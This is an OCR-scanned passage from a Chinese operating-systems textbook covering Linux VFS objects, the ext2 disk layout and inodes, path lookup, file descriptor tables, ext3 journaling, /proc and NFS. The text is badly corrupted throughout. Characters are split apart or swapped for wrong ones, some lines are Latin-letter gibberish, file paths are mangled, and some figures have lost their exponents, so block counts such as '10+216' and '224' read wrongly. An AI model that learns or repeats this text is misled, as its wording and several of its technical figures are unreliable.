dentry 数 据 结构 ， 它 表示 一 个 目录 项 。 这 个 数据 结构 由 文件 系统 在 运行 
过 程 中 创建 。 目 录 项 被 缓存 在 dentry_cache 中 ， 比 如 ，dentry_cache 会 包 
含 /，/usr，/usr/ast 的 目录 项 。 如 果 多 个 进程 通过 同一 个 硬 连 接 ( 即 相同 
路 径 ) 访问 同一 个 文件 ， 它 们 的 文件 对 象 都 会 指向 这 个 cache 中 的 同一 
个 目录 项 。 





file 数 据 结 构 是 一 个 打开 文件 在 内 存 中 的 表示 ， 并 且 在 调用 open 系 
统 调用 时 被 创建 。 它 支持 read、write、sendfile、lock 等 上 一 节 中 提 到 的 


系统 调用 。 


在 VFS 下 层 实现 的 实际 文件 系统 并 不 需要 在 内 部 使 用 与 VFS 完 全 相 
同 的 抽象 和 操作 ， 但 是 必须 实现 跟 VFS 对 象 所 指定 的 操作 在 语义 上 等 价 
的 文件 系统 操作 。 这 四 个 VFS 对 象 中 的 operations 数 据 结 构 的 元 系 部 是 指 
回 压 层 文件 系统 函数 的 指针 。 


2.Linux ext2 文 件 系 统 


接 下 来 ， 我 们 介绍 在 Linux 中 最 流行 的 磁盘 文件 系统 : ext2。 第 一 个 
Linux 操 作 系 统 使 用 MINIX 文 件 系 统 ， 但 是 它 限 制 了 文件 名 长 度 并 且 文 
件 长 度 最 大 只 能 是 64MB。 后 来 MINIX 被 第 一 个 扩展 文件 系统 ，ext 文 件 
系统 取代 。ext 可 以 支持 长 文件 名 和 大 文件 ， 但 由 于 它 的 效率 问题 ，ext 
被 ext2 代 蔡 ，ext2 在 今天 还 在 广泛 使 用 。 








ext2 的 磁盘 分 区 包含 了 一 个 如 图 10-31 所 示 的 文件 系统 。 块 0 不 被 
Linux 使 用 ， 而 通常 用 来 存放 启动 计算 机 的 代码 。 在 块 0 后 面 ， 磁 檀 分 区 
被 划分 为 知 干 个 块 组 ， 划 分 时 不 考虑 磁盘 的 物理 结构 。 每 个 块 组 的 结构 
如 下 : 





第 一 个 块 是 超级 块 ， 它 包含 了 该 文件 系统 的 信息 ， 包 括 i 节 点 的 个 
数 、 磁 盘 块 数 以 及 空 几 块 链表 的 起 始 位 置 ( 通 第 有 几 百 个 项 ) 。 下 一 个 
是 组 描述 符 ， 存 放 了 位 图 (bitmap〉 的 位 置 、 空 闪 块 数 、 组 中 的 i 节点 
数 ， 以 及 组 中 目录 数 等 信息 ， 这 个 信息 很 重要 ， 因 为 ext2 试 图 把 目录 均 





匀 地 分 散 存 储 到 磁盘 上 。 
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图 10-31 Linux ext2 文 件 系统 的 磁盘 布局 


两 个 位 图 分 别 记录 空间 块 和 空闲 节点 ， 这 是 从 MINIX1 文 件 系 统 继 
承 的 (大 多 数 UNIX 文 件 系 统 不 使 用 位 图 ， 而 使 用 空 帮 列表 〉 。 每 一 个 
位 图 的 大 小 是 一 个 块 。 如 果 一 个 块 大 小 是 IKB， 那 么 残 限 制 了 块 数 和 i 市 
扩 数 只 能 是 8192 个 。 块 数 是 一 个 严格 的 限制 ， 但 是 在 实际 应 用 中 ，i 节 
点 数 并 不 是 。 














在 超级 块 之 后 是 i 节 点 存储 区 域 ， 它 们 被 编号 为 1 到 某 个 最 大 值 。 
个 i 节 点 的 大 小 是 128 字 节 ， 并 且 每 一 个 i 节 点 恰好 描述 一 个 文件 。i 后 
包含 了 统计 信息 (包含 了 stat 系 统 调 用 能 获得 的 所 有 信息 ， 实 际 上 stat 就 
是 从 i 节点 读 取信 息 的 ) ， 也 包含 了 所 有 存放 该 文件 数据 的 磁盘 块 的 位 
置 。 











在 i 市 反 区 后 面 是 数据 块 区 ， 所 有 文件 和 目录 部 存放 在 这 个 区 域 。 
对 于 一 个 包含 了 一 个 以 上 磁盘 块 的 文件 和 目录 ， 这 些 磁盘 块 是 不 需要 连 
续 的 。 实 际 上 ， 一 个 大 文件 的 块 有 可 能 遍布 在 整个 磁盘 上 。 





目录 对 应 的 地 点 散布 在 磁盘 块 组 中 。 如 果 有 足够 的 空间 ，ext2 会 把 
普通 文件 组 织 到 与 父 目录 相同 的 块 组 上 ， 而 把 同一 个 块 上 的 数据 文件 组 
织 成 初始 文件 节点。 这 个 思想 来 自 Berkeley 的 快速 文件 系统 (McKusick 
等 人 ，1984) 。 位 图 用 于 快速 确定 在 什么 地 方 分 配 新 的 文件 系统 数据 。 
在 分 配 新 的 文件 块 时 ，ext2 也 会 给 该 文件 预 分 配 许多 (8 个 额外 的 数 
据 块 ， 这 样 可 以 减少 将 来 向 该 文件 写 入 数据 时 产生 的 文件 碎片 。 这 种 策 
略 在 整个 磁盘 上 实现 了 文件 系统 负载 平衡 ， 而 且 由 于 排列 和 缩减 文件 碎 
片 ， 它 的 性 能 也 很 好 。 


要 访问 文件 ， 必 须 首先 使 用 一 个 Linux 系 统 调用 ， 例 如 open， 该 调 
用 需要 文件 的 路 径 名 。 解 析 路 径 名 以 解析 出 单独 的 目录 。 如 果 使 用 相对 
路 径 ， 则 从 当前 进程 的 当前 目录 开始 查找 ， 人 否则 就 从 根 目 录 开 始 。 在 以 
上 两 种 情况 中 ， 第 一 个 目录 的 i 节 点 很 容易 定位 : 在 进程 描述 符 中 有 指 
问 它 的 指针 ;或 者 在 使 用 根 目录 的 情况 下 ， 它 存储 在 磁盘 上 预定 的 块 
IE; 





目录 文件 允许 不 超过 255 个 字符 的 文件 名 ， 如 图 10-32 所 示 。 每 一 个 
目录 都 由 整数 个 磁盘 块 组 成 ， 这 样 目 录 就 可 以 整体 写 入 磁盘 。 在 一 个 目 
录 中 ， 文 件 和 子 目 录 的 目录 项 是 未 排序 的 ， 并 且 一 个 紧 挨 着 一 个 。 目 录 
项 不 能 跨越 磁盘 块 ， 所 以 通常 在 每 个 磁盘 块 的 尾部 会 有 部 分 未 使 用 的 字 
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图 10-32 一 个 含有 三 个 文件 的 Linux 目 录 ; Db) 文 件 voluminous 被 删除 


后 的 目录 


图 10-32 中 的 每 个 目录 项 由 四 个 固定 长 度 的 域 和 一 个 可 变 长 度 的 域 
组 成 。 第 一 个 域 是 i 节点 号 ， 文 件 colossal 的 i 节点 号 是 19， 文 件 
voluminous 的 i 节 点 号 是 42， 目 录 bigdir 的 i 节 点 号 是 88。 接 下 来 是 rec_len 
域 ， 标 明 该 目录 项 的 大 小 《以 字 节 为 单位 ) ， 可 能 包括 名 字 后 面 的 一 些 
填充 。 在 名 字 以 未 知 长 度 填充 时 ， 这 个 域 被 用 来 寻找 下 一 个 目录 项 。 这 
也 是 图 10-32 中 箭头 的 含义 。 接 下 来 是 类 型 域 : 文件 、 目 录 等 。 最 后 一 
个 固定 域 是 文件 名 的 长 度 〈 以 字 节 为 单位 ) ， 在 例子 中 是 8、10 和 6。 最 
后 是 文件 名 ， 文 件 名 以 字 节 0 结束 ， 并 被 填充 到 32 字 节 边界 。 额 外 的 填 
充 可 以 在 此 之 后 。 





























在 图 10-32b 中 ， 我 们 看 到 的 是 文件 voluminous 的 目录 项 被 移 除 后 同 


一 个 目录 的 内 容 。 这 是 通过 增加 colossal 的 域 的 长 度 ， 将 voluminous 以 前 
所 在 的 域 变 为 第 一 个 目录 项 的 填充 。 当 然 ， 这 个 填充 可 以 用 来 作为 后 续 
的 目录 项 。 





由 于 目录 是 按 线性 顺序 奏 找 的 ， 要 找到 一 个 位 于 大 目录 末尾 的 目录 
项 会 耗费 相当 长 的 时 间 。 因 此 ， 系 统 为 近期 访问 过 的 目录 维护 一 个 组 
存 。 该 缓存 使 用 文件 名 进行 查找 ， 如 果 命 中 ， 那 么 就 可 以 避免 费时 的 线 
性 碍 找 。 组 成 路 径 的 每 个 部 分 都 在 目录 缓存 中 保存 一 个 dentry 对 象 ， 并 
且 通 过 它 的 i 点 查找 到 后 续 的 路 径 元 素 的 目录 项 ， 直 到 找到 真正 的 文 


件 i 节 点 。 








例如 ， 要 通过 绝对 路 径 名 来 查找 一 个 文件 〈 如 : /usrast/file) ， 和 需 
要 经 过 如 下 步 又。 首先， 系统 定位 根 目 录 ， 筷 通常 使 用 2 号 i 节 点 《特别 
Fe Si ABO RA ER ERIN TER) 。 系 统 在 目录 缓存 中 存放 一 
条 记录 以 便 将 来 对 根 目录 的 查找 。 然 后 ， 在 根 目 录 中 碍 找 字 符 串 “usr”， 
得 到 /usr 目 录 的 i 节 点 号 。/usr 目 录 的 i 节 点 号 同样 也 存 入 目录 缓存 。 然 后 
这 个 i 节 点 被 取 出 ， 并 从 中 解析 出 磁盘 块 ， 这 样 就 可 读 取 /usr 目 录 并 碍 找 
字符 串 “asfe。 一 且 找 到 这 个 目录 项 ， 目 录 /usrast 的 i 点 号 就 可 以 从 中 获 
得 。 有 了 msrvast 的 i 节 点 号 ， 就 可 以 读 取 i 节 点 并 确定 目录 所 在 的 磁盘 
块 。 最 后 ， 从 /usr/ast 目 录 查 找 “file” 并 确定 其 i 节点 号 。 因 此 ， 使 用 相对 
地 址 不 仅 对 用 户 来 说 更 加 方便 ， 而 且 也 为 系统 市 省 了 大 量 的 工作 。 




















如 果 文 件 存 在 ， 那 么 系统 提取 其 i 市 点 号 并 以 它 为 索引 在 i 市 点 表 





(在 磁盘 上 〉 中 定位 相应 的 节点， 并 装 入 内 存 。i 节 点 被 存放 在 i 节点 表 
中 ， 其 中 i 节点 表 是 一 个 内 核 数据 结构 ， 用 于 保存 所 有 当前 打开 的 文件 

和 目录 的 i 节点 。i 节 点 表 项 的 格式 至 少 要 包含 stat 系 统 调用 返回 的 所 有 

域 ， 以 保证 stat 正 常 运行 〈 见 图 10-28) 。 图 10-33 中 列 出 了 i 节点 结构 中 

由 Linux 文 件 系 统 层 支持 的 一 些 域 。 实 际 的 i 节点 结构 包含 更 多 的 域 ， 这 
是 由 于 该 数据 结构 也 用 于 表示 目录 、 设 备 以 及 其 他 特殊 文件 。i 节 点 结 

构 中 还 包含 了 一 些 为 将 来 的 应 用 保留 的 域 。 历 史 已 经 表明 未 使 用 的 位 不 
会 长 时 间 保 持 这 种 方式 。 
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文件 类 型 、 保 护 位 、 setuid 和 setgid 位 
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文件 属 主 的 UID 
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12 个 磁盘 块 及 其 后 面 3 个 间接 块 的 地 址 
generation 数 〈 每 次 i 节 点 被 重用 时 增加 ) 
最 近 访 问 文件 的 时 间 
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修改 文件 的 时 间 
改变 i 节点 的 时 间 (除去 其 他 时 间 )〉 











zai 





图 10-33 Linux 的 i 节 点 结构 中 的 一 些 域 


现在 来 看 看 系统 如 何 读 取 文件 。 对 于 调用 了 read 系 统 调 用 的 库 函 数 
的 一 个 典型 使 用 是 : 




















n=read(fd,buffer,nbytes) ; 











当 内 核 得 到 控制 权时 ， 它 需要 从 这 三 个 参数 以 及 内 部 表 中 与 用 户 有 
关 的 信息 开始 。 内 部 表 中 的 项 目 之 一 古文 件 描 述 符 数组 。 文 件 描述 符 数 
组 用 文件 描述 符 作 为 索引 并 为 每 一 个 打开 的 文件 保存 一 个 表 项 〈 最 多 达 
到 最 大 值 ， 通 币 默 认 是 32 个 ) 。 








这 里 的 思想 是 从 一 个 文件 描述 符 开始 ， 找 到 文件 对 应 的 i 节 点 为 
止 。 考 虑 一 个 可 能 的 设计 : 在 文件 描述 符 表 中 存放 一 个 指 网 ij 节点 的 指 
针 。 尽 管 这 很 简单 ， 但 不 笠 的 是 这 个 方法 不 能 奏效 。 其 中 存在 的 问题 
是 : 与 每 个 文件 描述 符 相 关联 的 是 用 来 指明 下 一 次 读 〈 写 ) 从 哪个 字 市 
开始 的 文件 读 写 位 置 ， 它 该 放 在 什么 地 方 ? 一 个 可 能 的 方法 是 将 它 放 到 
i 节 点 表 中 。 但 是 ， 当 两 个 或 两 个 以 上 不 相关 的 进程 同时 打开 同一 个 文 
件 时 ， 由 于 每 个 进程 有 目 己 的 文件 读 写 位 置 ， 这 个 方法 就 失效 了 。 








另 一 个 可 能 的 方法 是 将 文件 读 写 位 置 放 到 文件 描述 符 表 中 。 这 样 ， 
每 个 打开 文件 的 进程 都 有 自己 的 文件 读 写 位 置 。 不 幸 的 是 ， 这 个 方法 也 
是 失败 的 ， 但 是 其 原因 更 加 微妙 并 且 与 Linux 的 文件 共享 的 本 质 有 关 。 
考虑 一 个 shell 脚 本 s， 它 由 顺序 执行 的 两 个 命令 pl 和 p2 组 成 。 如 果 访 shell 
脚本 在 命令 行 








s>x 


下 被 调用 ， 我 们 预期 p1 将 它 的 输出 写 到 x 中 ， 然 后 p2 也 将 输出 写 到 x 
中 ， 并 且 从 p1 结 束 的 地 方 开 始 。 


当 shell 生 成 p1 时 ，x 初 始 是 空 的 ， 从 而 p1 从 文件 位 置 0 开始 写 入 。 然 
而 ， 当 pl 结束 时 就 必须 通过 某 种 机 制 使 得 p2 看 到 的 初始 文件 位 置 不 是 
0 如 果 将 文件 位 置 存放 在 文件 描述 符 表 中 ，p2 将 看 到 0〉， 而 是 pl 结束 
时 的 位 置 。 





实现 这 一 点 的 方法 如 图 10-34 所 示 。 实 现 的 技巧 是 在 文件 描述 符 表 
和 i 节点 表 之 间 引 入 一 个 新 的 表 ， 叫 做 打开 文件 描述 表 ， 并 将 文件 读 写 
位 置 ( 以 及 读 / 写 位 〉 放 到 里 面 。 在 这 个 图 中 ， 父 进程 是 shell 而 子 进程 首 
先是 p1 然 后 是 p2。 当 shell 生 成 pl 时 ，p1 的 用 户 结构 (包括 文件 描述 符 
K) 是 shell 的 用 户 结构 的 一 个 副本 ， 因 此 两 者 都 指向 相同 的 打开 文件 描 
述 表 的 表 项 。 当 p1 结 束 时 ，shell 的 文件 描述 符 仍 然 指 向 包含 p1 的 文件 位 
置 的 打开 文件 描述 。 当 shell 生 成 p2 时 ， 新 的 子 进程 自动 继承 文件 读 写 位 
置 ， 甚 至 p2 和 shell 都 不 需要 知道 文件 读 写 位 置 到 底 是 在 哪里 。 














然而 ， 当 不 相关 的 进程 打开 该 文件 时 ， 它 将 得 到 目 己 的 打开 文件 描 
述 表 项 ， 以 及 目 己 的 文件 读 写 位 置 ， 而 这 正 是 我 们 所 需要 的 。 因 此 ， 打 
开 文 件 描述 表 的 重点 是 允许 父 进程 和 子 进程 共享 一 个 文件 读 写 位 置 ， 而 
给 不 相关 的 进程 提供 各 目 私 有 的 值 。 


再 来 看 读 操 作 ， 我 们 已 经 说 明了 如 何 定位 文件 读 写 位 置 和 i 市 护 。i 
节点 包含 文件 前 12 个 数据 块 的 磁盘 地 址 。 如 果 文 件 位 置 是 在 前 12 个 块 ， 
那么 这 个 块 被 读 入 并 且 其 中 的 数据 被 复制 给 用 户 。 对 于 长 度 大 于 12 个 数 
据 块 的 文件 ，i 汪 点 中 有 一 个 域 包含 一 个 一 级 间接 块 的 磁盘 地 址 ， 如 疼 








10-34 所 示 。 这 个 块 含 有 更 多 的 磁盘 块 的 磁盘 地 址 。 例 如 ， 如 果 一 个 磁 
盘 块 大 小 为 IKB 而 磁盘 地 址 长 度 是 4 字 节 ， 那 么 这 个 一 级 间接 块 可 以 保 
存 256 个 磁盘 地 址 。 因 此 这 个 方案 对 于 总 长 度 在 268KB 以 内 的 文件 适 
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图 10-34 文件 描述 符 表 、 打 开 文 件 描述 表 和 i 节 点 表 之 间 的 关系 
除 此 之 外 ， 还 使 用 一 个 二 级 间接 块 。 它 包含 256 个 一 级 间接 块 的 地 


址 ， 每 个 一 级 间接 块 保存 256 个 数据 块 的 地 址 。 这 个 机 制 能 够 处 理 
10+216 个 块 (67119 104 字 节 ) 。 如 果 这 样 仍然 不 够 ， 那 么 i 节点 为 三 级 





间接 块 留 下 了 空间 ， 三 级 间接 块 的 指针 指向 许多 二 级 间接 块 。 这 个 寻 址 
方案 能 够 处 理 大 小 为 224 个 1KB 块 (16GB) 的 文件 。 对 于 块 大 小 是 8KB 
的 情况 ， 这 个 寻 址 方案 能 够 支持 最 大 64TB 的 文件 。 





3.Linux Ext3 文 件 系 统 


为 了 防止 由 系统 崩 尝 和 电源 故障 造成 的 数据 丢失 ，ext2 文 件 系统 必 
须 在 每 个 数据 块 创 建 之 后 立即 将 其 写 出 到 磁盘 上 。 必 有 需 的 磁盘 磁头 寻 道 
操作 导致 的 延迟 是 如 此 之 长 以 至 于 性 能 差 得 无 法 让 人 接受 。 因 此 ， 写 操 
作 和 被 延迟 ， 对 文件 的 改动 可 能 在 30 秒 内 都 不 会 提交 给 磁盘 ， 而 相对 于 现 
代 的 计算 机 硬件 来 说 ， 这 是 一 段 相 当 长 的 时 间 间 隔 。 


为 了 增强 文件 系统 的 健壮 性 ，Linux 依 靠 日 志文 件 系统 。Ext3， 作 
为 Ext2 文 件 系统 的 改进 ， 就 是 一 个 日 志文 件 系统 的 例子 。 





这 种 文件 系统 背后 的 基本 思想 是 维护 一 个 日 志 ， 该 日 志 顺 序 记 录 所 
有 文件 系统 操作 。 通 过 顺序 写 出 文件 系统 数据 或 元 数据 (i 节点 ， 超 级 
块 等 ) 的 改动 ， 该 操作 不 必 妨 受 随机 磁盘 访问 时 磁头 移动 带 来 的 开销 。 
最 后 ， 这 些 改 动 将 被 写 到 适当 的 磁盘 地 址 ， 而 相应 的 日 志 项 可 以 被 丢 
Fo WOR AB Te LDR TE BL FES ZA ACHE, AA TE BUR SY Re 
H, AACR IM BSC HF RARA BIE AY. Al AIM AS, FF 
执行 日 志 记 录 所 描述 的 文件 系统 改动 。 








Ext3 设 计 成 与 Ext2 高 度 兼 容 ， 事 实 上 ， 两 个 系统 中 所 有 的 核心 数据 








结构 和 磁盘 布局 都 是 相同 的 。 此 外 ， 一 个 作为 ext2 系 统 被 凶 载 的 文件 系 
统 随 后 可 以 作为 ext3 系 统 被 加 载 并 提供 日 志 能 力 。 





志 是 一 个 以 环形 缓冲 器 形式 组 织 的 文件 。 日 志 可 以 存储 在 主 文件 
系统 所 在 的 设备 上 也 可 以 存储 在 其 他 设备 上 。 由 于 日 志 操作 本 号 不 被 日 
志 记 录 ， 这 些 操作 并 不 是 被 日 志 所 在 的 ext3 文 件 系 统 处 理 的 ， 而 是 使 用 
一 个 独立 的 日 志 块 设备 (Journaling Block Device, JBD) 来 执行 日 志 的 


读 / 写 操作 。 








JBD 文 持 三 个 主要 数据 结构 : 日 志 记录 、 原 子 操作 处 理 和 事务 。 一 
个 日 志 记 录 搬 述 一 个 低级 文件 系统 操作 ， 该 操作 通常 导致 天内 变化 。 鉴 
于 系统 调用 (如 write〉 包含 多 个 地 方 的 改动 一 一 i 节点 、 现 有 的 文件 
块 、 新 的 文件 块 、 空 几 块 列表 等 ， 所 以 将 相关 的 日 志 记 录 按 照 原子 操作 
分 成 组 。Ext3 将 系统 调用 过 程 的 起 始 和 结束 通知 JPBD， 这 样 JBD 能 够 保 
证 一 个 原子 操作 中 的 所 有 日 志 记 录 或 者 都 被 应 用 ， 或 者 没有 一 个 被 应 
用 。 最 后 ， 主 要 从 效率 方面 考虑 ，JBD 将 原子 操作 的 汇集 作为 事务 对 
待 。 一 个 事务 中 日 志 记 录 是 连续 存储 的 。 仅 当 一 个 事务 中 的 所 有 日 志 记 
录 都 被 安全 提交 到 磁盘 后 ，JBD 才 允许 日 志文 件 的 相应 部 分 被 丢 痉 。 























把 每 个 磁盘 改动 的 日 关 记 录 项 写 到 磁盘 可 能 开销 很 大 ，ext3 可 以 配 
置 为 保存 所 有 磁盘 改动 的 日 志 或 者 仅仅 保存 文件 系统 元 数据 〈i 节 点 、 
超级 块 、 位 映射 等 ) 改动 的 日 志 。 只 记录 元 数据 会 使 系统 开销 更 小 ， 性 
能 更 好 ， 但 是 不 能 保证 文件 数据 不 会 损坏 。 一 些 其 他 的 日 志文 件 系统 仅 














仅 维护 关于 元 数据 操作 的 日 志 《〈 例 如 ，SGI 的 XFS) 。 
4./proc 文 件 系统 


另 一 个 Linux 文 件 系统 是 /proc (process) 文件 系统 。 其 思想 来 自 于 
Bell 实 验 室 开 发 的 第 8 版 UNIX， 后 来 被 4.4BSD 和 System V 采 用 。 不 过 ， 
Linux 在 几 个 方面 对 该 思想 进行 了 扩充 。 其 基本 概念 是 为 系统 中 的 每 个 
进程 在 /proc 中 创建 一 个 目录 。 目 录 的 名 字 是 进程 PID 的 十 制 数值 。 例 








如 ，/proc/619 是 与 PID 为 619 的 进程 相对 应 的 目录 。 在 该 目录 下 是 进程 信 
恩 的 文件 ， 如 进程 的 命令 行 、 环 境 变 量 和 信号 掩 码 等 。 事 实 上 ， 这 些 文 
件 在 磁盘 上 并 不 存在 。 当 读 取 这 些 文件 时 ， 系 统 按 需 从 进程 中 抽取 这 些 
言 息 ， 并 以 标准 格式 将 其 返回 给 用 户 。 





许多 Linux 扩 展 与 /proc 中 其 他 的 文件 和 目录 相关 。 它 们 包含 各 种 各 
REIT CPU. WANK We. PTI. ARB. MPA. 
己 加 载 模块 等 信息 。 非 特权 用 户 可 以 读 取 很 多 这 样 的 信息 ， 于 是 就 可 以 
通过 一 种 安全 的 方式 了 解 系统 的 行为 。 其 中 的 部 分 文件 可 以 被 写 入 ， 以 
达到 改变 系统 参数 的 目的 。 


10.6.4 NES: 网 络 文件 系统 


网 络 在 Linux 中 起 着 重要 作用 ， 在 UNIX 中 也 是 如 此 一 一 自从 网 络 出 
现 开始 (第 一 个 UNIX 网 络 是 为 了 将 新 的 内 核 从 PDP-11/70 转 移 到 
Interdata 8/32 上 而 建立 的 ) 。 本 节 将 考察 Sun Microsystem 的 NFS《〈 网 络 
文件 系统 ) 。 该 文件 系统 应 用 于 所 有 的 现代 Linux 系 统 中 ， 其 作用 是 将 
不 同 计算 机 上 的 不 同文 件 系 统 连 接 成 一 个 逻辑 整体 。 当 前 主流 的 NFS 实 
现 是 1994 年 提出 的 第 3 版 。NFS 第 4 版 在 2000 年 提出 ， 并 在 前 一 个 NFS 体 
系 结构 上 做 了 一 些 增 强 。NFS 有 三 个 方面 值得 关注 : 体系 结构 、 协 议和 
实现 。 我 们 现在 将 依次 考察 这 三 个 方面 ， 首 先是 简化 的 NFS 第 3 版 ， 然 
后 简要 探讨 第 4 版 所 做 的 增强 。 


1.NFS 体 系 结构 


NFS 背 后 的 基本 思想 是 允许 任意 选 定 的 一 些 客 户 闻 和 服务 器 共享 一 
个 公共 文件 系统 。 在 很 多 情况 下 ， 所 有 的 客户 端 和 服务 需 都 在 同一 个 局 
域 网 中 ， 但 这 并 不 是 必需 的 。 如 果 服 务 器 距离 客户 端 很 远 ，NFS 也 可 以 
在 广域网 上 运行 。 简 单 起 见 ， 我 们 还 是 说 客户 端 和 服务 器 ， 就 好 像 它们 
位 于 不 同 的 机 器 上 ， 但 实际 上 ，NFS 人 允许 一 台 机 器 同时 既是 客户 端 又 是 
服务 器 。 














每 一 个 NFS 服 务 器 都 导出 一 个 或 多 个 目录 供 远程 客户 端 访问 。 当 一 


个 目录 可 用 时 ， 它 的 所 有 子 目 录 也 都 可 用 ， 因 而 事实 上 ， 整 个 目录 树 通 
常 作 为 一 个 单元 导出 。 服 务 器 导出 的 目录 列表 用 一 个 文件 来 维护 ， 通 各 
古 /etc/exports。 因 此 服务 器 启动 后 这 些 目 录 可 以 被 自动 地 导出 。 客 户 端 
通过 挂 载 这 些 导 出 的 目录 来 访问 它们 。 当 一 个 客户 端 挂 载 了 一 个 〈 远 
Ke) 目录 ， 该 目录 就 成 为 客户 端 目录 层次 的 一 部 分 ， 如 图 10-35 所 示 。 








1 号 客户 机 





/usr/ast/work 





cp Is mv sh 





2 号 服务 器 


图 10-35 远程 挂 载 的 文件 系统 的 例子 。 图 中 的 方 框 表示 目录 ， 圆 形 表 


示 文 件 


在 这 个 例子 中 ， 客 户 端 1 将 服务 器 1 的 bin 目 录 挂 载 到 客户 端 1 自己 的 
bin 目录。 因此 它 现在 可 以 用 /bin/sh 引 用 shell 并 获得 服务 器 的 shell。 无 磁 


盘 工 作 站 通常 只 有 一 个 框架 文件 系统 〈 在 RAM 中 ) ， 它 从 远程 服务 器 
中 得 到 所 有 的 文件 ， 就 像 上 例 中 一 样 。 类 似 地 ， 客 户 端 1 将 服务 器 2 中 
的 /projects 目 录 挂 载 到 自己 的 /usr/ast/work 目 录 ， 因 此 它 用 
usrast/work/projl/a 就 可 以 访问 文件 a。 最 后 ， 客 户 端 2 也 挂 载 了 projects 目 
录 ， 它 可 以 用 /mntprojLa 访 问 文 件 a。 从 这 里 可 以 看 到 ， 由 于 不 同 的 客 
户 端 将 文件 挂 载 到 各 自 目 录 树 中 不 同 的 位 置 ， 同 一 个 文件 在 不 同 的 客户 
端 有 不 同 的 名 字 。 对 客户 端 来 说 挂 载 点 是 完全 局 部 的 ， 服 务 器 不 会 知道 
文件 在 任何 一 个 客户 端 中 的 挂 载 点 。 








2.NFS 协 议 





由 于 NEFS 的 目标 之 一 古文 持 开 构 系 统 ， 客 户 端 和 服务 器 可 能 在 不 同 
人 硬件 上 运行 不 同 操作 系统 ， 因 此 对 客户 端 和 服务 器 之 间 的 接口 给 予 明 确 
定义 是 很 关键 的 。 只 有 这 样 ， 才 有 可 能 让 任何 一 个 新 的 客户 端 能 够 跟 现 
有 的 服务 器 一 起 正确 工作 ， 反 之 亦 然 。 


NFS 通 过 定义 两 个 客户 端 -服务 器 协议 来 实现 这 一 目标 。 一 个 协议 就 
征 从 客户 端 发 送 到 服务 器 的 一 组 请 求 以 及 从 服务 器 返回 给 客户 端的 啊 应 
的 集合 。 


第 一 个 NFS 协 议 处 理 挂 载 。 客 户 端 可 以 同 服 务 需 发 送 路 径 名 ， 请 求 
服务 器 许可 将 该 目录 挂 载 到 目 己 的 目录 层次 的 某 个 地 方 。 由 于 服务 器 并 
不 关心 目录 将 被 挂 载 到 何 处 ， 因 此 请 求 消 有 息 中 并 不 包含 挂 载 地 址 。 如 末 











路 径 名 是 合法 的 并 且 该 目录 已 被 导出 ， 那 么 服务 器 问 客 户 端 返回 一 个 文 
件 句柄 。 这 个 文件 句柄 中 的 域 惟 一 地 标识 了 文件 系统 类 型 、 磁 盘 、 目 录 
的 i 节点 写 以 及 安全 信息 等 。 随 后 对 已 挂 载 目录 及 其 子 目录 中 文件 的 读 
写 都 使 用 该 文件 句柄 。 





Linux 启 动 时 会 在 进入 多 用 户 之 前 运行 shell 脚 本 /etc/rc。 可 以 将 挂 载 
远程 文件 系统 的 命令 写 入 该 脚本 中 ， 这 样 就 可 以 在 允许 用 户 登录 之 前 自 
动 挂 载 必要 的 远程 文件 系统 。 此 外 ， 大 部 分 Linux 版 本 也 文 持 自动 挂 
载 。 这 个 特性 允许 一 组 远程 目录 跟 一 个 本 地 目录 相关 联 。 当 客户 端 局 动 
时 ， 并 不 挂 载 这 些 远 程 目录 (甚至 不 与 它们 所 在 的 服务 器 进行 联络 )。 
相反 ， 在 第 一 次 打开 远程 文件 时 ， 操 作 系统 回 每 个 服务 器 发 送 一 条 信 
恩 。 第 一 个 啊 应 的 服务 器 胜出 ， 其 目录 被 挂 载 。 














相对 于 通过 /etc/rc 文 件 进行 静态 挂 载 ， 目 动 挂 载 具有 两 个 主要 优 
势 。 第 一 ， 如 果 /etcirc 中 列 出 的 茶 个 NFS 服 务 喜 出 了 故障 ， 那 么 客户 端 
将 无 法 启动， 或 者 至 少 会 带 来 一 些 困 难 、 延 迟 以 及 很 多 出 错 信息 。 如 果 
用 户 当 前 根本 就 不 需要 这 个 服务 器 ， 那 么 刚才 的 工作 就 日 旨 了 。 第 二 ， 
允许 客 户 端 并 行 地 答 试 一 组 服务 器 ， 可 以 实现 一 定 程度 的 容错 性 《因为 
只 要 其 中 一 个 是 在 运行 的 就 可 以 了 ) ， 而 且 性 能 也 可 以 得 到 提高 〈 通 过 
选择 第 一 个 啊 应 的 服务 器 一 一 推测 该 服务 喜 负 载 最 低 ) 。 


劝 一 方面 ， 我 们 默认 在 目 动 挂 载 时 所 有 可 选 的 文件 系统 都 是 完全 相 
同 的 。 由 于 NEFS 不 提供 对 文件 或 目录 复制 的 文 持 ， 用 户 需 要 上 自己 确保 所 








有 这 些 文件 系统 都 是 相同 的 。 因 此 ， 自 动 挂 载 多 数 情况 下 被 用 于 包含 系 
统 代码 的 只 读 文件 系统 和 其 他 很 少 改动 的 文件 。 


第 二 个 NFS 协 议 是 为 访问 目录 和 文件 设计 的 。 客 户 痢 可 以 通过 向 服 
务 句 发 送 消 恩 来 操作 目录 和 读 写 文 件 。 客户 端 也 可 以 访问 文件 属性 ， 如 
文件 模式 、 大 小 、 上 次 修改 时 间 。NFS 支 持 大 多 数 的 Linux 系 统 调用 ， 
但 是 也 许 很 让 人 惊讶 的 是 ，open 和 close 不 被 支持 。 











对 open 和 close 的 省 略 并 不 是 意外 事件 ， 而 纯粹 是 有 意 为 之 。 没 有 必 
要 在 读 一 个 文件 之 前 先 打开 它 ， 也 没有 必要 在 读 完 后 关闭 它 。 读 文件 
时 ， 客 户 端 加 服务 器 发 送 一 个 包含 文件 名 的 lookup 消 息 ， 请 求 碍 询 该 文 
件 并 返回 一 个 标识 该 文件 的 文件 句柄 〈 即 包含 文件 系统 标识 符 i 节 点 号 
以 及 其 他 数据 ) 。 与 open 调 用 不 同 ，lookup 操 作 不 向 系统 内 部 表 中 复制 
任何 信息 。read 调 用 包含 要 读 取 的 文件 的 文件 句柄 ， 起 始 侦 移 量 和 需要 
的 字 贡 数 。 每 个 这 样 的 消息 都 是 目 包 含 的 。 这 个 方案 的 优势 是 在 两 次 
read 调 用 之 间 ， 服 务 器 不 需要 记 住 任何 关于 已 打开 的 连接 的 信息 。 因 
此 ， 如 末 一 个 服务 器 在 月 尝 之 后 恢复 ， 所 有 关于 已 打开 文件 的 信息 都 不 
会 丢失 ， 因 为 这 些 信息 原本 就 不 存在 。 像 这 样 不 维护 打开 文件 的 状态 信 
县 的 服务 器 称 作 是 无 状态 的 。 




















